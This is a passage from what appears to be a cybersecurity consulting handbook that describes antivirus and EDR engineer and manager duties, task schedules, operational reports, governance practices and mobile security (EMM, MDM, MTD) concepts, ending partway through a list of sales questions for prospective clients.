3.4.4 What does an L1 Antivirus Engineer do?
An L1 (Level 1) Antivirus Engineer is responsible for the initial triage and response to alerts
generated by the antivirus system. Some of the common activities performed by an L1
Antivirus/EDR Engineer include:
1. Monitoring and triaging alerts: The L1 engineer monitors the alerts generated by the
antivirus and EDR system, assesses their severity, and takes appropriate actions to
investigate and contain the threat.
2. Conducting basic analysis: The L1 engineer performs basic analysis of the alerts to
determine the nature of the threat and identify any affected systems. They may also
search for additional indicators of compromise and communicate their findings to the
L2 or L3 team.
3. Responding to incidents: The L1 engineer responds to security incidents, such as
malware infections or suspicious activity, by initiating remediation steps, such as
isolating or quarantining affected systems.
4. Escalating incidents: If the L1 engineer is unable to contain or remediate a security
incident, they escalate the issue to the L2 or L3 team for further investigation and
response.
5. Maintaining documentation: The L1 engineer maintains detailed documentation of
the alerts, incidents, and their responses, including any remediation steps taken, for
future reference and reporting purposes.
6. Conducting basic maintenance: The L1 engineer may perform basic maintenance
activities on the antivirus and EDR system, such as updating virus definitions or running
scans, to ensure its ongoing effectiveness.
Overall, the L1 Antivirus/EDR Engineer plays a critical role in the initial response to security
incidents and in ensuring the overall effectiveness of the antivirus and EDR system. They work

closely with the L2 and L3 teams to provide support, escalate issues, and drive the ongoing
development and improvement of the system.
An L2 (Level 2) Antivirus Engineer is responsible for investigating and responding to security

incidents that have been escalated by the L1 team. Some of the common activities performed
by an L2 Antivirus Engineer include:
1. Incident investigation: The L2 engineer investigates security incidents escalated by the
L1 team and performs in-depth analysis to identify the root cause of the incident, the
extent of the impact, and any affected systems.
2. Malware analysis: The L2 engineer conducts malware analysis to determine the
behaviour of the malware, the systems it has infected, and any potential vulnerabilities
or attack vectors that may have been exploited.
3. Threat hunting: The L2 engineer performs threat hunting activities, such as proactively
searching for indicators of compromise and conducting analysis to detect any
suspicious or anomalous activity on the network or endpoints.
4. Response coordination: The L2 engineer coordinates incident response activities,
including isolating infected systems, containing the incident, and remediating the
threat.
5. Documentation and reporting: The L2 engineer maintains detailed documentation of
the incident investigation and response, including any remediation steps taken, for
future reference and reporting purposes.
6. Technology management: The L2 engineer is responsible for managing the antivirus
and EDR technology, ensuring that it is up to date, properly configured, and effectively
integrated into the overall security architecture.
Overall, the L2 Antivirus/EDR Engineer plays a critical role in incident investigation and
response, as well as in ensuring the ongoing effectiveness of the antivirus and EDR system.
They work closely with the L1 and L3 teams to provide support, drive the development of new
security controls and processes, and continuously improve the overall security posture of the
organization.
An L3 (Level 3) Antivirus Engineer is responsible for the overall management of the antivirus,
including designing, implementing, and maintaining the solution. Some of the common
activities performed by an L3 Antivirus Engineer include:
1. Design and architecture: The L3 engineer is responsible for designing and architecting
the antivirus and EDR system, ensuring that it meets the organization's security
requirements, is scalable, and integrates effectively with other security technologies.
2. Technical leadership: The L3 engineer provides technical leadership to the L1 and L2
teams, serving as a subject matter expert and providing guidance and direction on

incident investigation and response, system management, and technology
implementation.
3. Performance and capacity management: The L3 engineer monitors the performance
and capacity of the antivirus and EDR system, identifying and addressing any
performance or scalability issues, and proactively planning for future growth.
4. Risk management: The L3 engineer is responsible for managing the risk associated with
the antivirus and EDR system, identifying and mitigating any vulnerabilities or
weaknesses in the system.
5. Vendor management: The L3 engineer works closely with vendors to ensure that the
antivirus and EDR solution is up to date, properly configured, and effectively
integrated with other security technologies.
6. Technology innovation: The L3 engineer drives technology innovation within the
antivirus and EDR domain, researching new technologies and approaches to improve
the overall effectiveness of the system.
Overall, the L3 Antivirus/EDR Engineer plays a critical role in the ongoing management and
optimization of the antivirus and EDR system. They work closely with other security teams to
ensure that the system is integrated effectively with other security technologies, and they are
responsible for ensuring that the system is designed, implemented, and maintained to the
highest standards.

3.4.7 What does an EDR Service Engineer do
Sl
Head Service Engineer work particulars Frequency
No.
Monitoring and Monitor the EDR console to identify any security incidents or
1 Daily
Incident Response alerts triggered by potential threats on endpoints
Investigate and triage security incidents to assess their severity,
2 Incident Triage Daily
impact, and root cause.
Threat Hunting and Conduct proactive threat hunting activities using 's EDR capabilities
3 Daily
intelligence to identify hidden or advanced threats on endpoints.
Endpoint Health Review the health and status of endpoints, ensuring that the
4 Daily
Checks agent is operational and up to date.
Provide technical support and troubleshooting assistance to end-
Troubleshooting and
5 users and other IT or security teams related to EDR functionalities Daily
Support
and deployments.
Security Policy Review and fine-tune security policies within the console to align
6 Daily
Management with the organization's security requirements.
Vulnerability Use the platform's vulnerability assessment features to identify
7 Assessment and vulnerable endpoints and collaborate with IT teams to prioritize Daily
Patching patching.
Analyze and investigate suspicious files or incidents to determine if
8 Malware Analysis Daily
they represent real threats.
Creating and Create or modify detection and response rules in to improve
9 Daily
Modifying Rules threat detection or response capabilities.
Collaborate with other security teams, such as SOC (Security
Engagement with
10 Operations Center) or incident response teams, to share Daily
Other Security Teams
intelligence and coordinate response efforts
Maintain documentation of incidents, investigations, and actions
11 Documentation Daily
taken for future reference and reporting.
Conduct training sessions and workshops for end-users to raise
End-User Training and
12 awareness about cybersecurity best practices and proper use of Daily
Education
the EDR solution.
Review external threat intelligence sources to stay informed about
Analyzing Threat
13 the latest threats and vulnerabilities, and apply relevant Daily
Intelligence
information to improve the organization's security posture.
Integrate with other security tools, such as SIEM or SOAR
Security Tool
14 platforms, to streamline incident response workflows and enhance Daily
Integration
overall security operations.
Stay updated on the latest trends, technologies, and best practices
15 Continuous Learning in cybersecurity and EDR to enhance your expertise and Daily
effectiveness in the role.

Sl
Head Particulars Frequency
No.
Conduct a weekly review of security incidents and alerts triggered
Weekly Incident
1 by the EDR solution. Analyze the incidents to identify any Weekly
Review
emerging patterns or trends.
Stay updated on the latest threat intelligence and security
Threat Intelligence
2 research to understand new attack vectors and threats relevant to Weekly
Update
the organization.
Performance Monitor the performance of the EDR platform to ensure it is
3 Weekly
Monitoring functioning optimally and efficiently.
Endpoint Health Perform a weekly health check on endpoints to verify that all
4 Weekly
Assessment devices have the latest agent version and are reporting correctly.
Vulnerability Review the status of identified vulnerabilities on endpoints and

5 Weekly
Assessment Follow-up coordinate with IT teams to ensure timely patching and mitigation.
Analyze the effectiveness of existing detection and response rules
Rule Tuning and
6 and fine-tune them to reduce false positives and improve threat Weekly
Optimization
detection accuracy.
Conduct scheduled threat hunting sessions to proactively search
Threat Hunting
7 for potential threats that may have bypassed traditional security Weekly
Sessions
controls.
Documentation Keep incident reports, investigations, and changes to security
8 Weekly
Updates policies and configurations up-to-date in the documentation.
Coordinate with the Security Operations Center (SOC) and Incident
Collaboration with
9 Response (IR) teams to share findings and enhance response Weekly
SOC and IR Teams
strategies.
Organize training sessions or knowledge-sharing sessions with
Training and
10 other IT or security teams to improve their understanding of the Weekly
Knowledge Sharing
EDR platform and its capabilities.
Conduct periodic testing and evaluations of new features, updates,
Testing and
11 or changes to the platform in a controlled environment before Weekly
Evaluations
implementing them in production.
Performance Generate weekly reports on the performance and effectiveness of
12 Weekly
Reporting the EDR solution, including incident trends and response times.
Security Awareness Contribute to security awareness initiatives across the
13 Weekly
Initiatives organization to promote a culture of security and best practices.
Identify areas for improvement in the EDR operations and propose
Continuous
14 enhancements to optimize the efficiency and effectiveness of the Weekly
Improvement
solution.
Participate in long-term planning discussions related to
15 Long-Term Planning cybersecurity strategy and improvements to the organization's Weekly
overall security posture.

Sl
No.
Conduct an in-depth analysis of security incidents and threat
Monthly Threat
1 trends observed over the past month. Identify any patterns or Monthly
Analysis
changes in the threat landscape.
Perform a comprehensive review of endpoint performance and
Endpoint Performance
2 health metrics to identify any anomalies or issues that require Monthly
Review
attention.
Review existing security policies and configurations in the EDR
Policy Review and
3 platform. Assess their effectiveness and update them if necessary Monthly
Update
to align with evolving threats and business needs.
Verify the coverage of agents on all endpoints within the
Endpoint Coverage
4 organization. Address any gaps in coverage to ensure all devices Monthly
Assessment
are protected.
Conduct monthly training sessions for end-users and employees to
5 User Training Sessions Monthly
promote cybersecurity awareness and reinforce best practices.
Organize a simulated incident response exercise to test the
Incident Response
6 organization's response capabilities and identify areas for Monthly
Exercise
improvement.
Patch Management Review the organization's patch management process and assess
7 Monthly
Review the effectiveness of patching activities in reducing vulnerabilities.
Root Cause Analysis Revisit previous security incidents and conduct root cause analyses
8 Monthly
Review to identify systemic issues and opportunities for prevention
Reevaluate the baseline behavior and security posture of
Endpoint Baseline
9 endpoints. Update baselines as needed to improve threat Monthly
Review
detection accuracy
Vendor Engage with representatives or participate in vendor webinars to
10 Monthly
Communication stay informed about product updates, features, and best practices
Review and remove any outdated or unnecessary policies, rules, or
11 Endpoint Cleanup configurations to maintain a streamlined and efficient EDR Monthly
environment
Compile monthly security metrics and reports to track the overall
Security Metrics and
12 security posture and demonstrate the effectiveness of the EDR Monthly
Reporting
solution to stakeholders
Collaborate with management to plan budget allocations for
Budget and Resource
13 cybersecurity initiatives and resource requirements for ongoing Monthly
Planning
EDR operations.
Dedicate time for self-learning and professional development in
14 Continuous Education the field of cybersecurity to enhance expertise and stay up-to-date Monthly
with industry trends
Participate in strategic planning sessions to align EDR initiatives
15 Strategic Planning Monthly
with the organization's broader cybersecurity and business goals

Sl
No.
Threat Landscape Conduct a comprehensive analysis of the evolving threat landscape
1 Quarterly
Analysis and identify emerging trends and new attack vectors
Review the performance and capabilities of the EDR platform.
EDR Platform
2 Assess whether it meets the organization's evolving needs and Quarterly
Evaluation
consider potential upgrades or enhancements
Plan and execute a thorough threat hunting campaign, focusing on
Threat Hunting
3 specific indicators or areas of concern identified in the quarterly Quarterly
Campaign
threat analysis.
Evaluate the effectiveness of the security awareness training
Security Awareness
4 conducted for end-users and employees. Make updates or Quarterly
Training Update
improvements to the training content and delivery methods.
Review and analyze security incidents that occurred over the past
Incident Response
5 quarter. Identify trends, patterns, and potential gaps in incident Quarterly
Review
response processes
Vulnerability
Evaluate the effectiveness of the organization's vulnerability
6 Management Quarterly
management program and identify areas for improvement
Assessment
Conduct a comprehensive review of the detection and response
Rules and Policies
7 rules, policies, and configurations in the EDR platform. Optimize Quarterly
Review
rules for improved accuracy and reduced false positives.
Gather quarterly endpoint security metrics to track performance
Endpoint Security
8 and measure the impact of the EDR solution on the organization's Quarterly
Metrics
security posture
Engage with cybersecurity vendors and attend industry
Engagement with
9 conferences or webinars to stay informed about the latest security Quarterly
Security Vendors
technologies and trends
Conduct a simulated tabletop exercise with relevant teams to test
Incident Response
10 the incident response process and identify opportunities for Quarterly
Tabletop Exercise
improvement
Prepare and present a quarterly report to management,
Quarterly Reporting to
11 highlighting the effectiveness of the EDR solution and key security Quarterly
Management
insights
Budget Review and Collaborate with stakeholders to review the cybersecurity budget
12 Quarterly
Planning and plan for any additional resource requirements or investments
Review the organization's participation in threat intelligence
Threat Intelligence
13 sharing communities and ensure active collaboration with peer Quarterly
Sharing Review
organizations
Updates on Stay updated on changes to industry-specific regulations and
14 Compliance compliance requirements. Ensure that the EDR solution aligns with Quarterly
Requirements these standards
Collaborate with other security teams and management to plan
Strategic Planning for
15 strategic enhancements to the organization's overall security Quarterly
Future Enhancements
posture, leveraging the capabilities of the EDR solution

3.4.8 What does an EDR Service Manager do
Sl
Head Service Engineer work particulars Frequency
No.
Communicate with the EDR Service Engineer team to assign tasks,
1 Team Coordination Daily
prioritize activities, and ensure smooth workflow
Review and oversee the handling of security incidents and alerts
2 Incident Management triggered by the EDR platform. Provide guidance and support in Daily
incident response efforts.
Performance Monitor the performance and health of the EDR solution and
3 Daily
Monitoring endpoints to ensure optimal functioning.
Collaborate with other IT and security teams, such as SOC, IR, and
Engagement with
4 IT operations, to ensure effective communication and Daily
Stakeholders
coordination.
Review and analyze daily metrics and reports related to EDR
5 Reporting and Metrics Daily
performance, security incidents, and response times
Allocate resources appropriately to address high-priority tasks and
6 Resource Allocation Daily
incidents efficiently.
Escalation Manage escalations from the EDR Service Engineer team and
7 Daily
Management provide guidance in resolving complex issues.
Vendor Interact with representatives or support teams to address
8 Daily
Communication technical issues, feature requests, or other inquiries
Training and Support the professional development of the EDR Service Engineer
9 Daily
Development team by providing training, mentorship, and guidance
Review security policies and configurations within the EDR
Policy Review and
10 platform. Ensure they align with security best practices and Daily
Update
organizational requirements
Ensure that the EDR operations adhere to relevant regulatory
11 Compliance Oversight Daily
requirements and compliance standards
Collaboration with Liaise with upper management to provide updates on EDR
12 Daily
Management operations, progress, and key performance indicators
Continuous
Identify areas for process improvement and implement strategies
13 Improvement Daily
to enhance the effectiveness and efficiency of the EDR service
Initiatives
Interact with key customers to address their concerns, gather
14 Customer Engagement Daily
feedback, and ensure satisfaction with the EDR service
Risk Assessment and Assess potential risks to the EDR infrastructure and develop
15 Daily
Mitigation mitigation plans to minimize security vulnerabilities

Sl
No.
Conduct weekly meetings with the EDR Service Engineer team to
1 Team Meeting discuss ongoing tasks, challenges, and progress on incidents and Weekly
projects
Review recent security incidents and their handling by the EDR
2 Incident Review Service Engineer team. Provide feedback and guidance to improve Weekly
incident response.
Analyze weekly performance metrics, such as threat detection
Performance Metrics
3 rates, incident response times, and false positives, to identify Weekly
Analysis
trends and areas for improvement
Prepare and present weekly status updates to upper management
Status Updates to
4 on EDR operations, incident trends, and the overall security Weekly
Management
posture.
Assess resource requirements for the upcoming week and allocate
5 Resource Allocation Weekly
personnel and tools based on the workload and priority tasks
Communicate with key customers to address any concerns, update
6 Customer Engagement them on ongoing incidents, and ensure satisfaction with the EDR Weekly
service
Collaborate with the EDR Service Engineer team to review and
7 Policy and Rule Review update security policies and detection rules as needed to enhance Weekly
threat detection accuracy
Threat Intelligence Stay updated on the latest threat intelligence and analyze how it
8 Weekly
Analysis can be used to improve EDR capabilities
Plan training sessions or knowledge-sharing sessions for the EDR
Training and
9 Service Engineer team to enhance their skills and keep them Weekly
Knowledge Sharing
informed about the latest EDR features and best practices.
Review EDR Alerts and Review alerts and alarms generated by the EDR solution to ensure
10 Weekly
Alarms that critical incidents are appropriately prioritized and addressed.
Coordinate with the Security Operations Center (SOC) and Incident
Collaboration with
11 Response (IR) teams to share insights, improve communication, Weekly
SOC and IR Teams
and streamline incident response processes.
Review Service Level Evaluate SLAs and ensure that the EDR team is meeting response
12 Weekly
Agreements (SLAs) time and resolution targets.
Vendor Engage with representatives or support teams to address
13 Weekly
Communication technical issues, seek guidance, or escalate critical matters
Verify that EDR operations are in compliance with relevant
14 Compliance Check Weekly
regulatory standards and internal policies
Documentation and Ensure that incident reports, metrics, and other documentation
15 Weekly
Reporting are up-to-date and accurate for future reference and audits

Sl
No.
Conduct a comprehensive review of the EDR service's performance
Monthly Performance
1 over the past month, analyzing incident response metrics, Monthly
Review
detection rates, and overall effectiveness
Assess the workload and resource allocation within the EDR
2 Resource Planning Service Engineer team. Plan for any necessary adjustments or Monthly
additional resources.
Service Level
Evaluate the team's adherence to SLAs and identify areas for
3 Agreement (SLA) Monthly
improvement in meeting response and resolution targets
Review
Analyze incident trends over the past month to identify recurring
Incident Trend
4 threats or areas where additional preventive measures may be Monthly
Analysis
needed
Plan and execute security awareness initiatives for employees to
Security Awareness
5 enhance their understanding of cybersecurity best practices and Monthly
Initiatives
how to utilize the EDR solution effectively
Engage with representatives and other security vendors to discuss
Collaboration with
6 ongoing challenges, feature requests, and opportunities for further Monthly
Security Vendors
integration
Continuous Develop improvement plans based on identified trends and areas
7 Improvement of opportunity, with a focus on enhancing the overall efficiency Monthly
Initiatives and efficacy of the EDR service
Perform a risk assessment to identify potential vulnerabilities or
Risk Assessment and
8 gaps in the EDR infrastructure, and create plans to mitigate those Monthly
Mitigation
risks
Vendor Performance Evaluate the performance and support provided by as a vendor,
9 Monthly
Evaluation providing feedback and addressing any concerns or issues
Update key stakeholders, including upper management and other
Stakeholder
10 security teams, on the status of the EDR service and any notable Monthly
Communication
developments
Collaborate with other security leaders to develop a long-term EDR
Long-Term EDR
11 strategy that aligns with the organization's cybersecurity objectives Monthly
Strategy Development
and business goals
Review and Update
Ensure that incident response playbooks are updated with the
12 Incident Response Monthly
latest threat intelligence and response strategies
Playbooks
Collaborate with finance and upper management to review the
Budget Review and
13 budget allocated to the EDR service and plan for future budget Monthly
Planning
needs
Employee Conduct performance evaluations for the EDR Service Engineer
14 Performance and team, provide feedback, and identify opportunities for Monthly
Development professional development
Customer Feedback Review customer feedback and satisfaction scores to identify areas
15 Monthly
Analysis for improvement in customer service and support

Sl
No.
Conduct a comprehensive evaluation of the EDR service's
Quarterly Performance
1 performance and effectiveness over the past quarter. Analyze Quarterly
Evaluation
incident trends, response times, and customer satisfaction metrics.
Review and update the strategic roadmap for the EDR service,
Strategic Roadmap
2 ensuring alignment with the organization's evolving cybersecurity Quarterly
Review
strategy
Prepare and conduct a Quarterly Business Review with upper
Quarterly Business
3 management and key stakeholders, highlighting the achievements, Quarterly
Review (QBR)
challenges, and future plans of the EDR service
EDR Solution Assess the need for any enhancements or upgrades to the EDR
4 Enhancement solution to optimize its capabilities and align with emerging Quarterly
Evaluation threats
Conduct a comprehensive assessment of the organization's overall
Security Posture
5 security posture, focusing on the impact and effectiveness of the Quarterly
Assessment
EDR service
Review the risk management strategies in place, including threat
Risk Management
6 modeling and vulnerability assessments, to ensure that risks are Quarterly
Review
effectively mitigated
Plan for long-term resource requirements, including staffing,
Long-Term Resource
7 training, and technology investments, to support the EDR service's Quarterly
Planning
growth
Perform a compliance audit to ensure that the EDR service meets
8 Compliance Audit Quarterly
relevant regulatory requirements and industry standards
Vendor Performance Evaluate the performance and effectiveness of as a vendor,
9 Quarterly
Evaluation assessing support responsiveness and product updates
Conduct a simulated incident response exercise to test the EDR
Incident Response
10 service's capabilities and the team's readiness to handle complex Quarterly
Exercise
security incidents.
Review the performance and development needs of the EDR
EDR Service Engineer
11 Service Engineer team. Identify areas for improvement and plan Quarterly
Team Assessment
training initiatives
Assess the effectiveness of integrating external threat intelligence
Threat Intelligence
12 feeds into the EDR solution and adjust the integration strategy as Quarterly
Integration Review
needed
Third-Party Vendor Perform a risk assessment of third-party vendors and suppliers to
13 Quarterly
Assessment ensure they meet the organization's security requirements
Customer Feedback Review customer feedback and satisfaction scores for the quarter,
14 Quarterly
Analysis and address any concerns or suggestions from customers
Reevaluate the cybersecurity budget for the upcoming quarters,
15 Budget Reevaluation considering new requirements and lessons learned from the past Quarterly
quarter

3.4.9 Reports- Anti- Virus Operations
Anti-virus operation reports typically include the following:

1. Anti-virus scan results report: A report that shows the results of regular anti-virus
scans, including any malware detections and the actions taken to remediate them.
2. Security incident report: A report that details any security incidents that occurred
during the reporting period, including the type of incident, the cause, and the steps
taken to mitigate the risk.
3. Vulnerability assessment report: A report that details the results of regular
vulnerability assessments, including any potential security weaknesses and the steps
taken to address them.
4. Security audit report: A report that details the results of regular security audits,
including any findings or recommendations for improvement.
5. User access report: A report that provides a detailed view of user access to systems
and data, including which users have accessed what resources and when.
6. License management report: A report that provides an overview of software licenses
and usage, including the number of licenses in use and any licenses that are due to
expire.
7. Network activity report: A report that provides a detailed view of network activity,
including any unusual or potentially malicious traffic.
In short, anti-virus operation reports provide valuable insights into the security of a
computer or network and are essential for understanding the effectiveness of the anti-virus
solution and for identifying areas for improvement.
3.4.10 Reports- EDR Operations
EDR operation reports typically include the following:

1. Incident Summary Report: Provides an overview of recent security incidents detected
by the EDR solution, including incident types, affected endpoints, and actions taken.
2. Threat Detection Report: Details information about detected threats, such as
malware, ransomware, or suspicious behaviour, including the affected endpoint,
timestamp, and threat severity.
3. Alert Report: Lists alerts generated by the EDR solution, including information on the
triggering event, alert category, and recommended actions.
4. Endpoint Activity Report: Offers a summary of activities and events on individual
endpoints, such as application executions, file changes, and network connections.
5. User Behaviour Report: Analyses user activity and behaviour on endpoints to identify
unusual or potentially malicious actions.
6. Vulnerability Assessment Report: Provides information on vulnerabilities found on
endpoints, including severity ratings and recommended remediation actions.

7. Policy Violation Report: Lists instances where security policies were violated on
endpoints, such as unauthorized software installations or configuration changes.
8. Threat Hunting Report: Summarizes proactive threat hunting activities, including
searches for suspicious patterns or indicators of compromise.
9. Forensic Investigation Report: Details the findings of forensic investigations conducted
in response to security incidents, including evidence collected and conclusions drawn.
10. Compliance Report: Assesses the organization's compliance with security standards,
regulations, or internal policies and identifies areas that may need attention.
11. Data Exfiltration Report: Highlights incidents or activities involving the unauthorized
transfer of data from endpoints to external sources.
12. Endpoint Health Report: Evaluates the overall health and security status of endpoints,
including patch management, system updates, and antivirus status.
13. Network Traffic Analysis Report: Analyses network traffic originating from or directed
at endpoints to identify suspicious or malicious communication.
14. Malicious Behaviour Analysis Report: Provides in-depth analysis of specific malicious
behaviours or incidents, including tactics, techniques, and procedures (TTPs) used by
attackers.
15. Security Dashboard: Presents a visual summary of key security metrics, incidents, and
trends for quick at-a-glance monitoring.
16. Historical Trend Analysis Report: Shows historical data on security incidents, alert
volumes, and threat trends over time, aiding in long-term security planning.
17. Custom Reports: Allows organizations to create custom reports tailored to their
specific requirements, incorporating selected data and metrics.
These reports play a crucial role in helping organizations understand their security posture,
respond to threats, meet compliance requirements, and make informed decisions to
strengthen their cybersecurity defences. The availability and format of these reports may vary
across different EDR solutions, so it's essential to review the documentation provided by your
chosen EDR vendor to fully understand the reporting capabilities.
3.4.11 Governance of Antivirus solution
The governance of an antivirus solution refers to the policies, processes, and practices that
are put in place to manage, monitor, and maintain the solution over time. The goal of antivirus
governance is to ensure that the solution is effective, efficient, and aligned with the needs
and goals of the organization. Some key aspects of antivirus governance include:
1. Policy development: Developing clear policies that outline the scope, purpose, and use
of the antivirus solution, as well as the responsibilities of users and administrators.
2. Deployment planning: Carefully planning and executing the deployment of the
antivirus solution, including considerations such as testing, training, and support.

3. Configuration management: Ensuring that the antivirus solution is configured and
maintained in accordance with established policies and best practices, including
updating virus definitions and making any necessary changes to settings.
4. Monitoring and reporting: Regularly monitoring the performance and effectiveness of
the antivirus solution, and providing regular reports on its status, health, and usage.
5. Incident response: Establishing clear processes and procedures for responding to
security incidents and potential threats, including the involvement of internal teams
and external partners as needed.
6. Compliance: Ensuring that the antivirus solution follows relevant regulations,
standards, and best practices, such as data privacy laws, industry standards, and
security guidelines.
7. User education and training: Providing users with the knowledge and skills needed to
use the antivirus solution effectively and safely, including regular training on security
awareness and best practices.
These are just some of the key aspects of antivirus governance. The specific policies and
procedures will depend on the needs and goals of the organization, as well as the scope and
complexity of the antivirus solution. It's important to regularly review and update the
governance framework as needed to ensure that the antivirus solution remains effective and
relevant over time. Work with client teams to baseline, benchmark, and build+ implement
these governance steps.
3.4.12 Governance of EDR solution
The governance of an EDR (Endpoint Detection and Response) solution involves establishing
policies, procedures, and controls to effectively manage and secure the use of the EDR
technology within an organization. Proper governance ensures that the EDR solution aligns
with the organization's security objectives, compliance requirements, and overall IT strategy.
Here's a step-by-step guide on how to govern an EDR solution effectively:
1. Define Governance Objectives: Clearly define the goals and objectives of governing
the EDR solution. Consider factors such as improving cybersecurity posture, reducing
incident response times, and ensuring compliance with industry regulations.
2. Establish a Governance Team: Form a cross-functional governance team that includes
representatives from IT, security, compliance, legal, and other relevant departments.
Assign roles and responsibilities within the team.
3. Develop EDR Policies and Procedures: Create comprehensive policies and procedures
specifically related to the use of the EDR solution. These documents should cover areas
such as incident response, data privacy, access control, and compliance.
4. Policy Review and Approval: Ensure that the EDR policies and procedures are reviewed
and approved by senior management or relevant stakeholders. Obtain their buy-in and
support.

5. Training and Awareness: Provide training and awareness programs for employees who
will be using the EDR solution. Ensure they understand their roles and responsibilities
regarding EDR governance.
6. Access Control and Authorization: Define access control policies that specify who has
access to the EDR solution, what level of access they have, and under what conditions.
Implement strong authentication mechanisms.
7. Data Privacy and Compliance: Address data privacy concerns and compliance
requirements, particularly if the EDR solution processes sensitive data. Ensure that the
solution aligns with relevant regulations (e.g., Indian IT Act, The Digital Personal Data
Protection Act, Reserve Bank of India, Insurance Regulatory and Development
Authority of India, Securities and Exchange Board of India, National Payments
Corporation of India, CERT-In, CEA (Cyber Security in Power Sector), HIPAA, GDPR, or
any other domestic or international regulation, directions, guidelines).
8. Incident Response Plan: Integrate the EDR solution into your organization's incident
response plan. Clearly define procedures for responding to security incidents detected
by the EDR tool.
9. Change Management: Implement change management processes to ensure that any
changes to the EDR solution, such as updates or configurations, are well-documented
and approved.
10. Monitoring and Audit Trails: Establish procedures for monitoring the EDR solution's
performance and generating audit trails of activities. Regularly review these logs for
anomalies and compliance checks.
11. Documentation and Record Keeping: Maintain comprehensive records related to the
EDR solution, including policies, configurations, incident reports, and audit logs.
12. Vendor Relationship Management: If the EDR solution is provided by a third-party
vendor, manage the vendor relationship effectively. Ensure they provide updates,
support, and adhere to service level agreements (SLAs).
13. Continuous Improvement: Regularly assess the effectiveness of your EDR governance
framework and make improvements as needed. Stay updated on emerging threats and
technologies.
14. Incident Reporting and Escalation: Establish clear reporting and escalation procedures
for security incidents detected by the EDR solution. Ensure that the appropriate teams
are notified promptly.
15. Review and Compliance Audits: Periodically review the EDR governance framework
and conduct compliance audits to ensure that the organization is adhering to its
policies and procedures.
16. Communication and Collaboration: Foster collaboration between IT, security, and
other relevant departments to ensure that EDR governance aligns with the
organization's broader goals and initiatives.
17. Senior Management Engagement: Engage senior management in the governance
process to ensure ongoing support, resource allocation, and alignment with the
organization's strategic objectives.

By establishing a robust governance framework for your EDR solution, you can enhance its
effectiveness, reduce security risks, and ensure that it contributes positively to your
organization's overall cybersecurity strategy.

4. Endpoint Security- Mobile Security
Mobile security refers to the measures taken to protect mobile devices such as smartphones
and tablets from cyber threats, data theft, and unauthorized access. This includes using secure
passwords and lock screens, avoiding public Wi-Fi, installing anti-virus software, keeping the
operating system and apps up to date, and being cautious of suspicious links or emails.
Additionally, using encrypted messaging and storage apps and regularly backing up important
data can also help enhance mobile security.
4.1 What is a mobile threat defence solution?
A mobile threat defense (MTD) solution is a type of software designed to protect mobile
devices against various security threats such as malware, malicious apps, phishing attacks,
and unauthorized access. MTD solutions typically use a combination of technologies such as
endpoint protection, mobile device management (MDM), mobile application management
(MAM), and threat intelligence to secure devices and protect sensitive data. Some MTD
solutions also provide features such as real-time monitoring, device management, and
reporting to help organizations manage and mitigate mobile security risks. The goal of MTD is
to prevent data breaches and protect sensitive information on mobile devices, both for
personal and business use.
4.1.1 EMM, MDM, MTD: What are these?
Enterprise Mobility Management (EMM), Mobile Device Management (MDM), and Mobile
Threat Defense (MTD) are related to securing mobile devices but serve different purposes.
EMM is a broader concept that encompasses MDM and provides additional functions beyond
just device management. EMM solutions provide a comprehensive approach to managing and
securing mobile devices, applications, and data across an organization. EMM solutions
typically include MDM capabilities, but also provide additional features such as mobile
application management (MAM), security and access control, and the ability to manage both
corporate and personal devices.
MDM refers to the process of managing and securing mobile devices such as smartphones
and tablets that are used for both personal and business purposes. MDM solutions provide
centralized control over devices, allowing IT administrators to manage device configurations,
enforce security policies, and remotely wipe devices in case of theft or loss.
MTD, on the other hand, is a type of software that focuses on protecting mobile devices from
specific security threats such as malware, phishing attacks, and unauthorized access. MTD
solutions typically use threat intelligence and endpoint protection to provide real-time
monitoring and protection against security threats.
A 20- point difference is as per the table below:

Sl No Category Elements EMM MDM MTD
1 Device Management Remote Lock or wipe Yes Yes
2 Device Management Apply enterprise policies on mobiles Yes Yes
3 Device Management Enforce mobile device encryption Yes Yes
4 Device Management Enforce business data encryption on mobiles Yes
5 Device Management Enforce device password Yes Yes
6 Device Management Enforce VPN Yes Yes
Advanced jailbreak/root detection, Risky device
7 Device Management Yes
configurations
On- device App-based threat protection- Malware,
8 Device Management Yes
spyware, rootkits, ransomware
9 Device Management On-device phishing protection Yes
10 Device Management Remote observability of high risk and malicious events Yes
11 Device Management Network-based threat protection- Man in the Middle, SSL Yes
12 Device Apps Management Malicious App Detection and Analysis Yes
13 Device Apps Management Enterpise software/ app mobile vulnerability detection Yes
14 Device Apps Management Block apps on mobiles Yes Yes Yes
15 Device Apps Management Block URLs- Web & Content-based threat protection Yes Yes Yes
16 Device Apps Management Remote app deployment and updates Yes
17 Device Apps Management Control Access to apps and data as per enterprise policy Yes
18 Device Apps Management Containerise personal and enterprise business data Yes
19 Device Features compatibility iOS, Android, and ChromeOS compatibility Partial Partial Partial
20 Device Features compatibility Device Battery hogger Partial Partial Partial
In summary, while EMM provides a more comprehensive solution for managing and securing
the entire mobile ecosystem within an organization, MDM provides a broader set of
management and control functions, and MTD focuses specifically on security and protecting
devices against specific security threats. In many cases, to provide a comprehensive mobile
device security solution, organizations use both EMM/ MDM and MTD solutions.
4.1.2 EMM, MDM, MTD types
There are several types of Enterprise Mobility Management (EMM), Mobile Device
Management (MDM), and Mobile Threat Defense (MTD) solutions available on the market:
EMM:
1. Full-fledged EMM: Provides a comprehensive solution for managing and securing
mobile devices, applications, and data across an organization.
2. Standalone EMM: Focuses on a specific aspect of EMM, such as mobile application
management (MAM) or security.
MDM:
1. On-premises MDM: Software installed on an organization's internal servers to manage
and secure mobile devices.
2. Cloud-based MDM: Manages and secures mobile devices through a cloud-based
solution.
MTD:

1. Real-time MTD: Provides real-time monitoring and protection against security threats.
2. On-demand MTD: Scans devices for threats on-demand, such as when prompted by
the user.
It is important to note that some EMM solutions also include MTD capabilities, while some
MTD solutions may also include some MDM features. Organizations can choose a solution
based on their specific needs and requirements.
4.2 Sales cue- Questions to ask and answers to give
4.2.1 Questions to ask prospective client
When evaluating Enterprise Mobility Management (EMM), Mobile Device Management

(MDM), or Mobile Threat Defense (MTD) solutions, it is important to ask the right questions
to ensure that the solution meets your prospective client’s specific needs and requirements.
Here are some questions you may want to ask your prospective client:
EMM:
1. What type of devices does the EMM solution need to support?
2. Does the EMM solution need to support both corporate and personal devices?
3. What security and access control features need to be included in the EMM solution?
4. How does the EMM solution need to handle mobile application management (MAM)?
5. What is the deployment model for the EMM solution (cloud-based or on-premises)?
MDM:
1. What type of devices does the MDM solution need to support?
2. How does the MDM solution need to enforce security policies on mobile devices?
